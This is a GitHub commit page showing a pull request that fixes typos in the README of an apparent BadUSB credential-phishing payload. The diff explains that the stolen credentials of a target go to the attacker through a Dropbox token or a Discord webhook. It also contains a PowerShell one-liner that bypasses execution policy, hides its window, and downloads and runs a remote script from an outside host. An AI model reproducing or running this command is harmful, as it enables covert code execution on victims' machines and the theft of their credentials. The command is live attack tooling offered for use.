Merge pull request #33 from Kavitate/patch-2

Updated README.md
This commit is contained in:
I-Am-Jakoby 2022-12-21 11:13:18 -06:00 committed by GitHub
commit b49e1f3cfb
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -41,13 +41,13 @@ Once the target enters their credentials their information will be uploaded to y
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
* You know longer need to host your own version of this script
* You no longer need to host your own version of this script
* `$db` is the variable that holds your DropBox token
* `$dc` is the variable that holds your discord webhook
* Fill in either or variable or both to set your exfil method
* `$dc` is the variable that holds your Discord webhook
* Fill in either variable or both to set your exfil method
```
powershell -noexit -ep bypass $dc='';$db='';iwr https://jakoby.lol/35k | iex
powershell -w h -ep bypass $dc='';$db='';iwr https://jakoby.lol/35k | iex
```
<p align="right">(<a href="#top">back to top</a>)</p>